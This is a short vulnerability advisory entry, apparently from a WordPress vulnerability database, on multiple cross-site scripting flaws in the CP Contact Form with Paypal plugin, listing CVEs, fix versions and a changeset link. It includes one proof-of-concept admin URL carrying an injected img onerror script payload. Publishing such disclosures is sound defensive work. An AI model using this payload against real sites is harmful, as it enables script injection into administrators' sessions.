CP Contact Form with Paypal <= 1.3.01 - Multiple XSS



Proof of Concept
Version <= 1.2.97 - /wp-admin/admin.php?page=cp_contact_form_paypal.php&edit=1&cal=1&item=css"><img src=x onerror=alert(/XSS/)>&r=1 (fixed in 1.2.98)

Affects Plugin

Fixed in version 1.3.02

References

CVE CVE-2019-14784
CVE CVE-2019-14785
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2110906%40cp-contact-form-with-paypal&old=2102944%40cp-contact-form-with-paypal

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Views 2855
Verified No
WPVDB ID 9381

Timeline

Publicly Published 2019-06-23 (5 months ago)
Added 2019-06-23 (5 months ago)
Last Updated 2019-08-21 (3 months ago)
